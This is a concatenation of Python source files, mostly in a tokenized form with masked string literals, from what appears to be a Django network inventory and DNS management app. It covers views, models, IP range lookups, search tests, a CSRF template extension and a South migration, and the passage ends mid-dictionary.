<EOL> return HttpResponsePermanentRedirect ( urlparams ( new_path , ** query ) ) <EOL> if full_path != request . path : <EOL> query_string = request . META . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> full_path = urllib . quote ( full_path . encode ( '<STR_LIT:utf-8>' ) ) <EOL> if query_string : <EOL> full_path = '<STR_LIT>' % ( full_path , query_string ) <EOL> response = HttpResponsePermanentRedirect ( full_path ) <EOL> old_locale = prefixer . locale <EOL> new_locale , _ = urlresolvers . split_path ( full_path ) <EOL> if old_locale != new_locale : <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return response <EOL> request . path_info = '<STR_LIT:/>' + prefixer . 
shortened_path <EOL> request . locale = prefixer . locale <EOL> tower . activate ( prefixer . locale ) </s>
<s> from django . contrib import messages <EOL> from django . forms import ValidationError <EOL> from django . db import IntegrityError <EOL> from django . shortcuts import redirect , render , get_object_or_404 <EOL> from django . views . generic import DeleteView <EOL> from django . views . generic import DetailView <EOL> from django . views . generic import CreateView <EOL> from django . views . generic import UpdateView <EOL> from django . views . generic import ListView <EOL> class BaseListView ( ListView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> class BaseDetailView ( DetailView ) : <EOL> template_name = '<STR_LIT>' <EOL> extra_context = None <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( DetailView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> class BaseCreateView ( CreateView ) : <EOL> template_name = "<STR_LIT>" <EOL> extra_context = None <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> obj = super ( BaseCreateView , self ) . post ( request , * args , ** kwargs ) <EOL> except ( IntegrityError , ValidationError ) , e : <EOL> messages . error ( request , str ( e ) ) <EOL> request . method = '<STR_LIT:GET>' <EOL> return super ( BaseCreateView , self ) . get ( request , * args , ** kwargs ) <EOL> return obj <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return super ( BaseCreateView , self ) . get ( request , * args , ** kwargs ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . 
extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> class BaseUpdateView ( UpdateView ) : <EOL> template_name = "<STR_LIT>" <EOL> extra_context = None <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( UpdateView , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_form ( self , form_class ) : <EOL> form = super ( BaseUpdateView , self ) . get_form ( form_class ) <EOL> return form <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> obj = super ( BaseUpdateView , self ) . post ( request , * args , ** kwargs ) <EOL> except ValidationError , e : <EOL> messages . error ( request , str ( e ) ) <EOL> request . method = '<STR_LIT:GET>' <EOL> return super ( BaseUpdateView , self ) . get ( request , * args , ** kwargs ) <EOL> return obj <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return super ( BaseUpdateView , self ) . get ( request , * args , ** kwargs ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> context = super ( UpdateView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> class BaseDeleteView ( DeleteView ) : <EOL> template_name = '<STR_LIT>' <EOL> success_url = '<STR_LIT:/>' <EOL> def get_object ( self , queryset = None ) : <EOL> obj = super ( BaseDeleteView , self ) . get_object ( ) <EOL> return obj <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> obj = get_object_or_404 ( <EOL> self . form_class . Meta . model , pk = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> ) <EOL> try : <EOL> view = super ( BaseDeleteView , self ) . delete ( request , * args , ** kwargs ) <EOL> except ValidationError , e : <EOL> messages . error ( request , "<STR_LIT>" . 
format ( '<STR_LIT:U+0020>' . join ( e . messages ) ) ) <EOL> return redirect ( obj ) <EOL> messages . success ( request , "<STR_LIT>" ) <EOL> return view <EOL> class Base ( DetailView ) : <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return render ( request , "<STR_LIT>" ) </s>
<s> from django . db import models <EOL> from django . db . models import Q <EOL> from django . core . exceptions import ValidationError <EOL> class KeyValue ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> id = models . AutoField ( primary_key = True ) <EOL> key = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> value = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> force_validation = False <EOL> class Meta : <EOL> abstract = True <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . key , self . value ) <EOL> @ property <EOL> def uri ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . __class__ . __name__ . lower ( ) , self . pk <EOL> ) <EOL> def get_absolute_url ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . __class__ . __name__ . lower ( ) , self . obj . pk <EOL> ) <EOL> def get_bundle ( self ) : <EOL> return { <EOL> '<STR_LIT:key>' : self . key , '<STR_LIT:value>' : self . value , '<STR_LIT>' : self . uri , <EOL> '<STR_LIT>' : self . pk , '<STR_LIT>' : self . obj . pk <EOL> } <EOL> def clean ( self , require_validation = True , check_unique = True ) : <EOL> key_attr = self . key . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> if ( not hasattr ( self , key_attr ) and <EOL> not hasattr ( self , "<STR_LIT>" + key_attr ) ) : <EOL> if self . force_validation and require_validation : <EOL> raise ValidationError ( "<STR_LIT>" % self . key ) <EOL> else : <EOL> if check_unique : <EOL> self . validate_unique ( ) <EOL> return <EOL> if hasattr ( self , key_attr ) : <EOL> validate = getattr ( self , key_attr ) <EOL> else : <EOL> validate = getattr ( self , "<STR_LIT>" + key_attr ) <EOL> if not callable ( validate ) : <EOL> raise ValidationError ( "<STR_LIT>" % <EOL> key_attr ) <EOL> try : <EOL> validate ( ) <EOL> except TypeError , e : <EOL> raise ValidationError ( "<STR_LIT:%s>" % str ( e ) ) <EOL> if check_unique : <EOL> self . 
validate_unique ( ) <EOL> def validate_unique ( self ) : <EOL> if ( self . __class__ . objects . filter ( <EOL> key = self . key , value = self . value , obj = self . obj ) . <EOL> filter ( ~ Q ( id = self . pk ) ) . exists ( ) ) : <EOL> raise ValidationError ( "<STR_LIT>" ) </s>
<s> from django . core . exceptions import ValidationError <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . shortcuts import render <EOL> from django . http import HttpResponse <EOL> from core . utils import int_to_ip , resolve_ip_type <EOL> from core . range . forms import RangeForm <EOL> from core . range . utils import range_usage <EOL> from core . range . ip_choosing_utils import ( <EOL> calculate_filters , label_value_maker , calc_template_ranges , <EOL> integrate_real_ranges , UN <EOL> ) <EOL> from core . range . models import Range <EOL> from core . site . models import Site <EOL> from core . vlan . models import Vlan <EOL> from core . network . models import Network <EOL> from mozdns . ip . models import ipv6_to_longs <EOL> from core . views import CoreDeleteView , CoreDetailView <EOL> from core . views import CoreCreateView , CoreUpdateView , CoreListView <EOL> import ipaddr <EOL> import simplejson as json <EOL> class RangeView ( object ) : <EOL> model = Range <EOL> form_class = RangeForm <EOL> queryset = Range . objects . all ( ) <EOL> class RangeDeleteView ( RangeView , CoreDeleteView ) : <EOL> pass <EOL> class RangeCreateView ( RangeView , CoreCreateView ) : <EOL> def get_form ( self , form_class ) : <EOL> if not self . request . POST : <EOL> initial = { } <EOL> initial . update ( dict ( self . request . GET . items ( ) ) ) <EOL> return form_class ( initial = initial ) <EOL> else : <EOL> return super ( RangeCreateView , self ) . get_form ( form_class ) <EOL> class RangeUpdateView ( RangeView , CoreUpdateView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeListView ( RangeView , CoreListView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeDetailView ( RangeView , CoreDetailView ) : <EOL> template_name = '<STR_LIT>' <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( RangeDetailView , self ) . get_context_data ( <EOL> ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . 
format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> def range_usage_text ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . get ( '<STR_LIT:end>' , None ) <EOL> format = request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not ( start and end ) : <EOL> return HttpResponse ( json . dumps ( { <EOL> '<STR_LIT:success>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> get_objects = request . GET . get ( '<STR_LIT>' , False ) <EOL> if start . find ( '<STR_LIT::>' ) > - <NUM_LIT:1> : <EOL> ip_type = '<STR_LIT>' <EOL> else : <EOL> ip_type = '<STR_LIT:4>' <EOL> try : <EOL> usage_data = range_usage ( start , end , ip_type , get_objects ) <EOL> except ( ValidationError , ipaddr . AddressValueError ) , e : <EOL> return HttpResponse ( <EOL> json . dumps ( { <EOL> '<STR_LIT>' : str ( e ) , <EOL> '<STR_LIT:success>' : False <EOL> } ) ) <EOL> if format == '<STR_LIT>' : <EOL> usage_data [ '<STR_LIT>' ] = map ( lambda x : ( int_to_ip ( x [ <NUM_LIT:0> ] , ip_type ) , <EOL> int_to_ip ( x [ <NUM_LIT:1> ] , ip_type ) ) , <EOL> usage_data [ '<STR_LIT>' ] ) <EOL> usage_data [ '<STR_LIT:success>' ] = True <EOL> return HttpResponse ( json . dumps ( usage_data ) ) <EOL> def range_usage_ajax ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . 
get ( '<STR_LIT:end>' , None ) <EOL> start_ip_type , _ = resolve_ip_type ( start ) <EOL> end_ip_type , _ = resolve_ip_type ( end ) <EOL> errors = None <EOL> if start_ip_type != end_ip_type or start_ip_type is None : <EOL> errors = "<STR_LIT>" <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> } ) <EOL> rusage = range_usage ( start , end , start_ip_type , get_objects = True ) <EOL> def translate_ip ( ip_i , * args ) : <EOL> return int_to_ip ( ip_i , start_ip_type ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> '<STR_LIT:start>' : start , <EOL> '<STR_LIT:end>' : end , <EOL> '<STR_LIT>' : int_to_ip ( start , start_ip_type ) , <EOL> '<STR_LIT>' : int_to_ip ( end , end_ip_type ) , <EOL> '<STR_LIT>' : rusage , <EOL> '<STR_LIT>' : translate_ip <EOL> } ) <EOL> def range_detail ( request , range_pk ) : <EOL> mrange = get_object_or_404 ( Range , pk = range_pk ) <EOL> attrs = mrange . keyvalue_set . all ( ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : mrange , <EOL> '<STR_LIT>' : attrs , <EOL> } ) <EOL> def redirect_to_range_from_ip ( request ) : <EOL> ip_str = request . GET . get ( '<STR_LIT>' ) <EOL> ip_type = request . GET . get ( '<STR_LIT>' ) <EOL> if not ( ip_str and ip_type ) : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> if ip_type == '<STR_LIT:4>' : <EOL> try : <EOL> ip_upper , ip_lower = <NUM_LIT:0> , int ( ipaddr . IPv4Address ( ip_str ) ) <EOL> except ipaddr . AddressValueError : <EOL> return HttpResponse ( <EOL> json . dumps ( { '<STR_LIT:success>' : False , '<STR_LIT:message>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( ip_str ) } ) ) <EOL> else : <EOL> try : <EOL> ip_upper , ip_lower = ipv6_to_longs ( ip_str ) <EOL> except ValidationError : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT:success>' : False , <EOL> '<STR_LIT:message>' : '<STR_LIT>' } ) ) <EOL> range_ = Range . objects . 
filter ( start_upper__lte = ip_upper , <EOL> start_lower__lte = ip_lower , <EOL> end_upper__gte = ip_upper , <EOL> end_lower__gte = ip_lower ) <EOL> if not len ( range_ ) == <NUM_LIT:1> : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> else : <EOL> return HttpResponse ( json . dumps ( <EOL> { '<STR_LIT:success>' : True , <EOL> '<STR_LIT>' : range_ [ <NUM_LIT:0> ] . get_absolute_url ( ) } ) ) <EOL> def get_next_available_ip_by_range ( request , range_id ) : <EOL> range = get_object_or_404 ( Range , id = range_id ) <EOL> ret = { } <EOL> ret_ip = range . get_next_ip ( ) <EOL> display_ip = ret_ip . exploded <EOL> ret [ '<STR_LIT:success>' ] = True <EOL> ret [ '<STR_LIT>' ] = display_ip <EOL> return HttpResponse ( json . dumps ( ret ) ) <EOL> def find_related ( request ) : <EOL> """<STR_LIT>""" <EOL> state = json . loads ( request . raw_post_data ) <EOL> if not state : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' not in state : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> try : <EOL> choice_type , choice_pk = state [ '<STR_LIT>' ] <EOL> except ValueError : <EOL> raise Exception ( <EOL> "<STR_LIT>" . format ( state [ '<STR_LIT>' ] ) <EOL> ) <EOL> filter_network , filter_site , filter_vlan = calculate_filters ( <EOL> choice_type , choice_pk <EOL> ) <EOL> format_network , format_site , format_vlan = label_value_maker ( ) <EOL> new_state = { <EOL> '<STR_LIT>' : format_site ( filter_site ( state [ '<STR_LIT>' ] ) ) , <EOL> '<STR_LIT>' : format_vlan ( filter_vlan ( state [ '<STR_LIT>' ] ) ) , <EOL> } <EOL> networks = filter_network ( state [ '<STR_LIT>' ] ) <EOL> if len ( networks ) == <NUM_LIT:1> : <EOL> new_state [ '<STR_LIT>' ] = integrate_real_ranges ( <EOL> networks [ <NUM_LIT:0> ] , calc_template_ranges ( networks [ <NUM_LIT:0> ] ) <EOL> ) <EOL> new_state [ '<STR_LIT>' ] = format_network ( networks ) <EOL> return HttpResponse ( json . 
dumps ( new_state ) ) <EOL> def ajax_find_related ( request ) : <EOL> networks = Network . objects . filter ( UN ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : Site . objects . all ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> '<STR_LIT>' : Vlan . objects . all ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> '<STR_LIT>' : networks <EOL> } ) <EOL> def debug_show_ranges ( request ) : <EOL> """<STR_LIT>""" <EOL> networks = Network . objects . filter ( UN ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : calc_template_ranges , <EOL> '<STR_LIT>' : networks <EOL> } ) </s>
<s> from django . test import TestCase <EOL> from mozdns . tests . utils import create_fake_zone <EOL> from mozdns . ptr . models import PTR <EOL> from mozdns . cname . models import CNAME <EOL> from mozdns . address_record . models import AddressRecord <EOL> from core . search . compiler . django_compile import compile_to_django <EOL> class SearchDNSTests ( TestCase ) : <EOL> def test_integration1 ( self ) : <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . 
assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> def test_integration2 ( self ) : <EOL> root_domain = create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> ptr = PTR ( name = "<STR_LIT>" , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT>" ) <EOL> ptr . save ( ) <EOL> addr = AddressRecord ( label = "<STR_LIT>" , domain = root_domain , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT>" ) <EOL> addr . save ( ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . 
assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> def test_integration3_zone ( self ) : <EOL> root_domain = create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> cn = CNAME ( label = "<STR_LIT>" , domain = root_domain , target = "<STR_LIT>" ) <EOL> cn . save ( ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> def test_integration4_ip_range ( self ) : <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> ptr = PTR ( name = "<STR_LIT>" , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT>" ) <EOL> ptr . save ( ) <EOL> res , error = compile_to_django ( ptr . ip_str ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . 
assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> def test_integration5_ip ( self ) : <EOL> root_domain = create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> create_fake_zone ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> res , error = compile_to_django ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) <EOL> ptr = PTR ( name = "<STR_LIT>" , ip_str = "<STR_LIT>" , <EOL> ip_type = "<STR_LIT:4>" ) <EOL> ptr . save ( ) <EOL> addr = AddressRecord ( label = "<STR_LIT>" , domain = root_domain , <EOL> ip_str = "<STR_LIT>" , ip_type = "<STR_LIT:4>" ) <EOL> addr . save ( ) <EOL> res , error = compile_to_django ( ptr . ip_str ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . 
assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:0> ) <EOL> res , error = compile_to_django ( "<STR_LIT>" ) <EOL> self . assertFalse ( error ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( res [ '<STR_LIT:A>' ] ) , <NUM_LIT:1> ) </s>
class Refresher(object):
    """Mixin providing a ``refresh`` helper for ORM model instances."""

    def refresh(self):
        """Return a fresh copy of this instance, re-fetched from the
        database by primary key via the class's default manager."""
        model = self.__class__
        return model.objects.get(pk=self.pk)
from jinja2 import nodes
from jinja2.ext import Extension
from django.utils.safestring import mark_safe
import traceback


class CsrfExtension(Extension):
    """Jinja2 tag extension that renders Django's CSRF token into templates."""

    tags = set(['<STR_LIT>'])

    def __init__(self, environment):
        self.environment = environment

    def parse(self, parser):
        """Consume the tag token and emit a call to ``_render`` with the
        template context's csrf token name bound as a load.

        Returns ``None`` if parsing fails; the traceback is printed so the
        template error is still visible.
        """
        try:
            token = parser.stream.next()
            return nodes.Output(
                [self.call_method('<STR_LIT>',
                                  [nodes.Name('<STR_LIT>', '<STR_LIT>')])]
            ).set_lineno(token.lineno)
        except Exception:
            # BUG FIX: was a bare ``except:`` -- that also swallowed
            # SystemExit/KeyboardInterrupt. Narrowed to Exception.
            traceback.print_exc()

    def _render(self, csrf_token):
        """<STR_LIT>"""
        if csrf_token:
            if csrf_token == '<STR_LIT>':
                return mark_safe(u"<STR_LIT>")
            else:
                return mark_safe(u"<STR_LIT>" % (csrf_token))
        else:
            # No token in context: warn loudly in DEBUG, render nothing.
            from django.conf import settings
            if settings.DEBUG:
                import warnings
                warnings.warn("<STR_LIT>")
            return u'<STR_LIT>'


# Alias used by Jinja2 environment configuration.
csrf_token = CsrfExtension
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """Raw-SQL South migration.

    ``forwards`` executes a hand-written SQL statement directly on the
    database connection; ``backwards`` is a no-op, so this migration is
    effectively irreversible.
    """

    def forwards(self, orm):
        # Bypasses the ORM/south db API and runs the raw SQL string below.
        from django.db import connection
        sql = """<STR_LIT>"""
        cursor = connection.cursor()
        cursor.execute(sql)

    def backwards(self, orm):
        # Intentionally empty: there is no reverse for the raw SQL above.
        pass

    # South's frozen-ORM snapshot. Auto-generated; do not hand-edit.
    models = {
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>', '<STR_LIT>': "<STR_LIT>"},
            '<STR_LIT:description>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:1>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:label>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>', '<STR_LIT>': "<STR_LIT>"},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
